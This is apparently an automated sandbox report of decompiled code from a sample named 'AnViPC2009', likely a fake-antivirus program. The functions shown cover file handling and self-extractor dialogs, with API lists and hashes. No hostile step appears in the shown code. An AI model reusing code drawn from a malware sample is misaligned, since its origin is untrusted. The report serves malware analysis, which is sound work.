                                                                                                                                                      			E00406007(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                      				void* _t12;
                                                                                                                                                      				intOrPtr _t19;
                                                                                                                                                      
                                                                                                                                                      				_t19 = _a12;
                                                                                                                                                      				 *((char*)(_t19 + 0x109c)) = 0;
                                                                                                                                                      				if(E00407252(__ecx, _a4, _a8) == 0) {
                                                                                                                                                      					_t12 = E00405BD2(__ecx, __edx, __eflags, 0xffffffff, _a4, _a8, _t19);
                                                                                                                                                      					__eflags = _t12 - 0xffffffff;
                                                                                                                                                      					if(_t12 == 0xffffffff) {
                                                                                                                                                      						goto L1;
                                                                                                                                                      					}
                                                                                                                                                      					FindClose(_t12); // executed
                                                                                                                                                      					_t8 = _t19 + 0x1098;
                                                                                                                                                      					 *_t8 =  *(_t19 + 0x1098) & 0x00000000;
                                                                                                                                                      					__eflags =  *_t8;
                                                                                                                                                      					 *((char*)(_t19 + 0xc10)) = E00405765( *((intOrPtr*)(_t19 + 0xc08)));
                                                                                                                                                      					return 1;
                                                                                                                                                      				}
                                                                                                                                                      				L1:
                                                                                                                                                      				return 0;
                                                                                                                                                      			}





                                                                                                                                                      0x0040600e
                                                                                                                                                      0x00406014
                                                                                                                                                      0x00406022
                                                                                                                                                      0x00406031
                                                                                                                                                      0x00406036
                                                                                                                                                      0x00406039
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040603c
                                                                                                                                                      0x00406048
                                                                                                                                                      0x00406048
                                                                                                                                                      0x00406048
                                                                                                                                                      0x00406054
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040605a
                                                                                                                                                      0x00406024
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,?,?,?,00404975,?,?,?,00000000,?,?), ref: 0040603C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                      • Opcode ID: ddd72c859a0e64e8ff79b562a707807e81bd6453bcb8e51290d5a757c6beaf7e
                                                                                                                                                      • Instruction ID: 3d7f3c3b9012688b66e0888be7438f14f03820285a0a93a3b7a5c38079f3b1d6
                                                                                                                                                      • Opcode Fuzzy Hash: ddd72c859a0e64e8ff79b562a707807e81bd6453bcb8e51290d5a757c6beaf7e
                                                                                                                                                      • Instruction Fuzzy Hash: 4EF05935000344FACF106FB08800AD73F54DF02330F14861AF9BD121D2C67660A4EB65
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00405018(void* __ecx) {
                                                                                                                                                      				void* _t2;
                                                                                                                                                      				long _t3;
                                                                                                                                                      
                                                                                                                                                      				_t2 =  *(__ecx + 4);
                                                                                                                                                      				if(_t2 != 0xffffffff) {
                                                                                                                                                      					_t3 = GetFileType(_t2); // executed
                                                                                                                                                      					if(_t3 == 2 || _t3 == 3) {
                                                                                                                                                      						return 1;
                                                                                                                                                      					} else {
                                                                                                                                                      						return 0;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      			}





                                                                                                                                                      0x00405018
                                                                                                                                                      0x0040501e
                                                                                                                                                      0x00405024
                                                                                                                                                      0x0040502d
                                                                                                                                                      0x0040503a
                                                                                                                                                      0x00405034
                                                                                                                                                      0x00405036
                                                                                                                                                      0x00405036
                                                                                                                                                      0x00405020
                                                                                                                                                      0x00405022
                                                                                                                                                      0x00405022

                                                                                                                                                      APIs
                                                                                                                                                      • GetFileType.KERNELBASE(?,004052DF,?,00405686,000000FF,?,00000000,?,00000000), ref: 00405024
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileType
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3081899298-0
                                                                                                                                                      • Opcode ID: b17af4d0c18cba9cbd1ce60f8f5e9395084e91915f2735113c94354b1645f1d0
                                                                                                                                                      • Instruction ID: dcf42afe2ef8df3973c4714377f73d6bbc07ffef476629597061786d6b19530e
                                                                                                                                                      • Opcode Fuzzy Hash: b17af4d0c18cba9cbd1ce60f8f5e9395084e91915f2735113c94354b1645f1d0
                                                                                                                                                      • Instruction Fuzzy Hash: 7CC080F051184011CF2045385D480AF234AD7433E67684EB1F021D11D0CB3CCD41FD84
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040BB02(CHAR* _a8, char _a12) {
                                                                                                                                                      				char _v1028;
                                                                                                                                                      				void* _t9;
                                                                                                                                                      
                                                                                                                                                      				wvsprintfA( &_v1028, _a8,  &_a12);
                                                                                                                                                      				_t9 = E0040AD1F(0,  &_v1028); // executed
                                                                                                                                                      				return _t9;
                                                                                                                                                      			}





                                                                                                                                                      0x0040bb19
                                                                                                                                                      0x0040bb28
                                                                                                                                                      0x0040bb2e

                                                                                                                                                      APIs
                                                                                                                                                      • wvsprintfA.USER32(?,?,00000000), ref: 0040BB19
                                                                                                                                                        • Part of subcall function 0040AD1F: GetDlgItem.USER32 ref: 0040AD30
                                                                                                                                                        • Part of subcall function 0040AD1F: ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0040AE68), ref: 0040AD5D
                                                                                                                                                        • Part of subcall function 0040AD1F: SendMessageA.USER32 ref: 0040AD69
                                                                                                                                                        • Part of subcall function 0040AD1F: SendMessageA.USER32 ref: 0040AD78
                                                                                                                                                        • Part of subcall function 0040AD1F: SendMessageA.USER32 ref: 0040AD8C
                                                                                                                                                        • Part of subcall function 0040AD1F: SendMessageA.USER32 ref: 0040ADA3
                                                                                                                                                        • Part of subcall function 0040AD1F: SendMessageA.USER32 ref: 0040ADDE
                                                                                                                                                        • Part of subcall function 0040AD1F: SendMessageA.USER32 ref: 0040ADED
                                                                                                                                                        • Part of subcall function 0040AD1F: SendMessageA.USER32 ref: 0040ADF5
                                                                                                                                                        • Part of subcall function 0040AD1F: SendMessageA.USER32 ref: 0040AE19
                                                                                                                                                        • Part of subcall function 0040AD1F: SendMessageA.USER32 ref: 0040AE2A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$ItemShowWindowwvsprintf
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3976247692-0
                                                                                                                                                      • Opcode ID: ac89b50ad9207998d755dd402bc8c71fbaceed47d53291932db5a15f621a6e2d
                                                                                                                                                      • Instruction ID: c2ee3160304b1538c28e521a8f14a5b695c401521c27dd2f9f5ee73c9ce627b5
                                                                                                                                                      • Opcode Fuzzy Hash: ac89b50ad9207998d755dd402bc8c71fbaceed47d53291932db5a15f621a6e2d
                                                                                                                                                      • Instruction Fuzzy Hash: 99D09EB540420D6BDF10EBA0DC45FE9776CBB0430DF0440A5BB14E2080E674D61A8B69
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040B25C(intOrPtr _a4, intOrPtr _a12) {
                                                                                                                                                      				long _t4;
                                                                                                                                                      
                                                                                                                                                      				_t4 = SendDlgItemMessageA( *0x419f80, 0x68, 0x402, E0040A8CA(_a4, _a12), 0); // executed
                                                                                                                                                      				return _t4;
                                                                                                                                                      			}




                                                                                                                                                      0x0040b279
                                                                                                                                                      0x0040b27f

                                                                                                                                                      APIs
                                                                                                                                                      • SendDlgItemMessageA.USER32(00000068,00000402,00000000,?,?), ref: 0040B279
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemMessageSend
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3015471070-0
                                                                                                                                                      • Opcode ID: 71e6d2e7532dd6190ca1bcb92f75971a0448e3bc7bd69867ee858639e09b572b
                                                                                                                                                      • Instruction ID: 23437daa5becad03fdd72996915a65651d8e0de7de601c66f6da30ca0f09f4fe
                                                                                                                                                      • Opcode Fuzzy Hash: 71e6d2e7532dd6190ca1bcb92f75971a0448e3bc7bd69867ee858639e09b572b
                                                                                                                                                      • Instruction Fuzzy Hash: ECC01231280304BBEA01AB009D0AF5ABB22BB90702F00C828B741A40F1C7B20836EA09
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 28%
                                                                                                                                                      			_entry_(void* __eflags) {
                                                                                                                                                      				void* _t3;
                                                                                                                                                      
                                                                                                                                                      				E0040A699(_t3);
                                                                                                                                                      				_push(0);
                                                                                                                                                      				_push(0);
                                                                                                                                                      				_push(0);
                                                                                                                                                      				_push(0); // executed
                                                                                                                                                      				E0040D37F(); // executed
                                                                                                                                                      				return 0;
                                                                                                                                                      			}




                                                                                                                                                      0x0040a7b1
                                                                                                                                                      0x0040a7b8
                                                                                                                                                      0x0040a7b9
                                                                                                                                                      0x0040a7ba
                                                                                                                                                      0x0040a7bb
                                                                                                                                                      0x0040a7bc
                                                                                                                                                      0x0040a7c1

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Module$EnvironmentHandleLoadNameVariableView$BitmapCloseCommandDialogIconInitializeLineMappingOpenParamUnmap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 50757371-0
                                                                                                                                                      • Opcode ID: ab70362c569cd47ca980f0429b2f695143b59ef30ce34a761a5feb4a0673a6dc
                                                                                                                                                      • Instruction ID: c6b8ce9343e560ac230c7b2287f334c9087cd8b9d03c2577f34d11881706e910
                                                                                                                                                      • Opcode Fuzzy Hash: ab70362c569cd47ca980f0429b2f695143b59ef30ce34a761a5feb4a0673a6dc
                                                                                                                                                      • Instruction Fuzzy Hash: 70A002C59206003CFA55B1F21C06D3F025CEA503083C44C7E3C40E2092E87D8C24007A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 58%
                                                                                                                                                      			E00405005(void* __ecx) {
                                                                                                                                                      				int _t2;
                                                                                                                                                      
                                                                                                                                                      				_t2 = SetEndOfFile( *(__ecx + 4)); // executed
                                                                                                                                                      				asm("sbb eax, eax");
                                                                                                                                                      				return  ~(_t2 - 1) + 1;
                                                                                                                                                      			}




                                                                                                                                                      0x00405008
                                                                                                                                                      0x00405011
                                                                                                                                                      0x00405014

                                                                                                                                                      APIs
                                                                                                                                                      • SetEndOfFile.KERNELBASE(?,00404673,?,?,?,?,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00405008
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 749574446-0
                                                                                                                                                      • Opcode ID: 35695a334c179d3fdb105df6b28fef7f8c654bfb2a09aee6fb026c81aca8a2b6
                                                                                                                                                      • Instruction ID: 9905a9e3862bacf609bba6f04cb261d5c2e3eccfd351d4ba6fba37e6883ed9d5
                                                                                                                                                      • Opcode Fuzzy Hash: 35695a334c179d3fdb105df6b28fef7f8c654bfb2a09aee6fb026c81aca8a2b6
                                                                                                                                                      • Instruction Fuzzy Hash: 86B01130AA000AAA8E002B30CE088283A20EA2230A300C2B0A002C80A0CBA2C822AB00
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00406EB8(signed char _a4, char _a8) {
                                                                                                                                                      				CHAR* _t3;
                                                                                                                                                      				CHAR* _t4;
                                                                                                                                                      
                                                                                                                                                      				_t3 = _a4 & 0x000000ff;
                                                                                                                                                      				if(_a8 == 0) {
                                                                                                                                                      					_t4 = CharUpperA(_t3); // executed
                                                                                                                                                      					return _t4;
                                                                                                                                                      				}
                                                                                                                                                      				return _t3;
                                                                                                                                                      			}





                                                                                                                                                      0x00406ebd
                                                                                                                                                      0x00406ec2
                                                                                                                                                      0x00406ec5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406ec5
                                                                                                                                                      0x00406ecb

                                                                                                                                                      APIs
                                                                                                                                                      • CharUpperA.USER32(?,00406F27,00000000,?,00000000,00000000,00000000,?,004070EE,00000000,00000000,00000000,__rar_,00000000,00000006,?), ref: 00406EC5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CharUpper
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 9403516-0
                                                                                                                                                      • Opcode ID: d83d66618008fe431018aceaab787c407ffc4b323d5e4df0f26faf67823b0682
                                                                                                                                                      • Instruction ID: ba9d90cde8a007340699385a0d8a16809da81f70cdc10cdb9d28539cfc716c97
                                                                                                                                                      • Opcode Fuzzy Hash: d83d66618008fe431018aceaab787c407ffc4b323d5e4df0f26faf67823b0682
                                                                                                                                                      • Instruction Fuzzy Hash: 0BB092A080839129DB12A360C628B2BBE942BA1312F16CC9AF0D5A1091C27C8528D769
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                      			E0040AE70(void* __ecx, void* __edx) {
                                                                                                                                                      				void* _t67;
                                                                                                                                                      				void* _t80;
                                                                                                                                                      				int _t82;
                                                                                                                                                      				signed int _t124;
                                                                                                                                                      				void* _t142;
                                                                                                                                                      				struct HICON__* _t143;
                                                                                                                                                      				void* _t146;
                                                                                                                                                      				void* _t147;
                                                                                                                                                      				void* _t148;
                                                                                                                                                      				void* _t149;
                                                                                                                                                      				void* _t150;
                                                                                                                                                      				void* _t156;
                                                                                                                                                      				signed int _t157;
                                                                                                                                                      				struct HWND__* _t163;
                                                                                                                                                      				void* _t171;
                                                                                                                                                      				void* _t173;
                                                                                                                                                      				void* _t174;
                                                                                                                                                      				void* _t176;
                                                                                                                                                      
                                                                                                                                                      				_t158 = __edx;
                                                                                                                                                      				_t156 = __ecx;
                                                                                                                                                      				_t171 = _t173 - 0x68;
                                                                                                                                                      				_t174 = _t173 - 0x95c;
                                                                                                                                                      				_t163 =  *(_t171 + 0x70);
                                                                                                                                                      				E00403059(__edx, _t163,  *(_t171 + 0x74),  *(_t171 + 0x78),  *((intOrPtr*)(_t171 + 0x7c)), "REPLACEFILEDLG", 0, 0);
                                                                                                                                                      				_t67 =  *(_t171 + 0x74) - 0x110;
                                                                                                                                                      				if(_t67 == 0) {
                                                                                                                                                      					E0040A484(_t171 - 0x8f4,  *((intOrPtr*)(_t171 + 0x7c)), 0x3ff);
                                                                                                                                                      					_push(0x400);
                                                                                                                                                      					 *((char*)(_t171 - 0x4f5)) = 0;
                                                                                                                                                      					E004079EF(_t156, _t171 - 0x8f4, 0);
                                                                                                                                                      					SetDlgItemTextA(_t163, 0x65, _t171 - 0x8f4);
                                                                                                                                                      					SHGetFileInfoA(_t171 - 0x8f4, 0, _t171 - 0x4f4, 0x160, 0x100);
                                                                                                                                                      					SendDlgItemMessageA( *(_t171 + 0x70), 0x66, 0x170,  *(_t171 - 0x4f4), 0);
                                                                                                                                                      					_t80 = FindFirstFileA(_t171 - 0x8f4, _t171 - 0x194);
                                                                                                                                                      					 *(_t171 + 0x74) = _t80;
                                                                                                                                                      					if(_t80 != 0xffffffff) {
                                                                                                                                                      						FileTimeToLocalFileTime(_t171 - 0x180, _t171 + 0x48);
                                                                                                                                                      						FileTimeToSystemTime(_t171 + 0x48, _t171 + 0x58);
                                                                                                                                                      						GetTimeFormatA(0x400, 2, _t171 + 0x58, 0, _t171 - 0x20, 0x32);
                                                                                                                                                      						GetDateFormatA(0x400, 0, _t171 + 0x58, 0, _t171 + 0x14, 0x32);
                                                                                                                                                      						wsprintfA(_t171 - 0x394, "%s %s %s", E004098D0(0x81), _t171 + 0x14, _t171 - 0x20);
                                                                                                                                                      						_t176 = _t174 + 0x14;
                                                                                                                                                      						SetDlgItemTextA( *(_t171 + 0x70), 0x6a, _t171 - 0x394);
                                                                                                                                                      						FindClose( *(_t171 + 0x74));
                                                                                                                                                      						if(( *(_t171 - 0x194) & 0x00000010) == 0) {
                                                                                                                                                      							E0040A864(_t156, _t158,  *((intOrPtr*)(_t171 - 0x174)), 0, _t171 - 0x54, 0x32);
                                                                                                                                                      							wsprintfA(_t171 - 0x394, "%s %s", _t171 - 0x54, E004098D0(0x80));
                                                                                                                                                      							_t176 = _t176 + 0x10;
                                                                                                                                                      							SetDlgItemTextA( *(_t171 + 0x70), 0x68, _t171 - 0x394);
                                                                                                                                                      						}
                                                                                                                                                      						SendDlgItemMessageA( *(_t171 + 0x70), 0x67, 0x170,  *(_t171 - 0x4f4), 0);
                                                                                                                                                      						DosDateTimeToFileTime( *0x419eda & 0x0000ffff,  *0x419ed8 & 0x0000ffff, _t171 + 0x50);
                                                                                                                                                      						FileTimeToSystemTime(_t171 + 0x50, _t171 + 0x58);
                                                                                                                                                      						GetTimeFormatA(0x400, 2, _t171 + 0x58, 0, _t171 - 0x20, 0x32);
                                                                                                                                                      						GetDateFormatA(0x400, 0, _t171 + 0x58, 0, _t171 + 0x14, 0x32);
                                                                                                                                                      						wsprintfA(_t171 - 0x394, "%s %s %s", E004098D0(0x81), _t171 + 0x14, _t171 - 0x20);
                                                                                                                                                      						SetDlgItemTextA( *(_t171 + 0x70), 0x6b, _t171 - 0x394);
                                                                                                                                                      						_t124 =  *0x419ee4; // 0x0
                                                                                                                                                      						_t157 =  *0x419ee0; // 0x0
                                                                                                                                                      						if(( *(_t171 - 0x194) & 0x00000010) == 0 || (_t157 | _t124) != 0) {
                                                                                                                                                      							E0040A864(_t157, _t171 - 0x54, _t157, _t124, _t171 - 0x54, 0x32);
                                                                                                                                                      							wsprintfA(_t171 - 0x394, "%s %s", _t171 - 0x54, E004098D0(0x80));
                                                                                                                                                      							SetDlgItemTextA( *(_t171 + 0x70), 0x69, _t171 - 0x394);
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					L25:
                                                                                                                                                      					_t82 = 1;
                                                                                                                                                      					L26:
                                                                                                                                                      					return _t82;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t67 != 1) {
                                                                                                                                                      					L9:
                                                                                                                                                      					_t82 = 0;
                                                                                                                                                      					goto L26;
                                                                                                                                                      				}
                                                                                                                                                      				_push(2);
                                                                                                                                                      				_pop(1);
                                                                                                                                                      				_t142 = ( *(_t171 + 0x78) & 0x0000ffff) - 1;
                                                                                                                                                      				if(_t142 == 0) {
                                                                                                                                                      					L14:
                                                                                                                                                      					_push(5);
                                                                                                                                                      					L15:
                                                                                                                                                      					_pop(1);
                                                                                                                                                      					L16:
                                                                                                                                                      					_t143 = SendDlgItemMessageA(_t163, 0x66, 0x171, 0, 0);
                                                                                                                                                      					if(_t143 != 0) {
                                                                                                                                                      						DestroyIcon(_t143);
                                                                                                                                                      					}
                                                                                                                                                      					EndDialog(_t163, 1);
                                                                                                                                                      					goto L25;
                                                                                                                                                      				}
                                                                                                                                                      				_t146 = _t142 - 0x6a;
                                                                                                                                                      				if(_t146 == 0) {
                                                                                                                                                      					goto L16;
                                                                                                                                                      				}
                                                                                                                                                      				_t147 = _t146 - 1;
                                                                                                                                                      				if(_t147 == 0) {
                                                                                                                                                      					goto L16;
                                                                                                                                                      				}
                                                                                                                                                      				_t148 = _t147 - 1;
                                                                                                                                                      				if(_t148 == 0) {
                                                                                                                                                      					_push(4);
                                                                                                                                                      					goto L15;
                                                                                                                                                      				}
                                                                                                                                                      				_t149 = _t148 - 1;
                                                                                                                                                      				if(_t149 == 0) {
                                                                                                                                                      					_push(3);
                                                                                                                                                      					goto L15;
                                                                                                                                                      				}
                                                                                                                                                      				_t150 = _t149 - 1;
                                                                                                                                                      				if(_t150 == 0) {
                                                                                                                                                      					_push(6);
                                                                                                                                                      					goto L15;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t150 == 1) {
                                                                                                                                                      					goto L14;
                                                                                                                                                      				}
                                                                                                                                                      				goto L9;
                                                                                                                                                      			}





















                                                                                                                                                      0x0040ae70
                                                                                                                                                      0x0040ae70
                                                                                                                                                      0x0040ae71
                                                                                                                                                      0x0040ae75
                                                                                                                                                      0x0040ae7e
                                                                                                                                                      0x0040ae94
                                                                                                                                                      0x0040ae9c
                                                                                                                                                      0x0040aea1
                                                                                                                                                      0x0040af17
                                                                                                                                                      0x0040af21
                                                                                                                                                      0x0040af2a
                                                                                                                                                      0x0040af30
                                                                                                                                                      0x0040af45
                                                                                                                                                      0x0040af60
                                                                                                                                                      0x0040af77
                                                                                                                                                      0x0040af8b
                                                                                                                                                      0x0040af91
                                                                                                                                                      0x0040af97
                                                                                                                                                      0x0040afa8
                                                                                                                                                      0x0040afb6
                                                                                                                                                      0x0040afca
                                                                                                                                                      0x0040afdd
                                                                                                                                                      0x0040b008
                                                                                                                                                      0x0040b00a
                                                                                                                                                      0x0040b019
                                                                                                                                                      0x0040b01e
                                                                                                                                                      0x0040b02b
                                                                                                                                                      0x0040b03b
                                                                                                                                                      0x0040b05b
                                                                                                                                                      0x0040b05d
                                                                                                                                                      0x0040b06c
                                                                                                                                                      0x0040b06c
                                                                                                                                                      0x0040b080
                                                                                                                                                      0x0040b09a
                                                                                                                                                      0x0040b0a8
                                                                                                                                                      0x0040b0bd
                                                                                                                                                      0x0040b0d2
                                                                                                                                                      0x0040b0f7
                                                                                                                                                      0x0040b108
                                                                                                                                                      0x0040b111
                                                                                                                                                      0x0040b116
                                                                                                                                                      0x0040b11c
                                                                                                                                                      0x0040b12c
                                                                                                                                                      0x0040b14c
                                                                                                                                                      0x0040b15d
                                                                                                                                                      0x0040b15d
                                                                                                                                                      0x0040b11c
                                                                                                                                                      0x0040b15f
                                                                                                                                                      0x0040b161
                                                                                                                                                      0x0040b162
                                                                                                                                                      0x0040b169
                                                                                                                                                      0x0040b169
                                                                                                                                                      0x0040aea4
                                                                                                                                                      0x0040aec5
                                                                                                                                                      0x0040aec5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040aec5
                                                                                                                                                      0x0040aeaa
                                                                                                                                                      0x0040aeac
                                                                                                                                                      0x0040aead
                                                                                                                                                      0x0040aeaf
                                                                                                                                                      0x0040aedd
                                                                                                                                                      0x0040aedd
                                                                                                                                                      0x0040aedf
                                                                                                                                                      0x0040aedf
                                                                                                                                                      0x0040aee0
                                                                                                                                                      0x0040aeea
                                                                                                                                                      0x0040aef2
                                                                                                                                                      0x0040aef5
                                                                                                                                                      0x0040aef5
                                                                                                                                                      0x0040aefd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040aefd
                                                                                                                                                      0x0040aeb1
                                                                                                                                                      0x0040aeb4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040aeda
                                                                                                                                                      0x0040aeb6
                                                                                                                                                      0x0040aeb7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040aeb9
                                                                                                                                                      0x0040aeba
                                                                                                                                                      0x0040aed4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040aed4
                                                                                                                                                      0x0040aebc
                                                                                                                                                      0x0040aebd
                                                                                                                                                      0x0040aed0
                                                                                                                                                      0x00000000
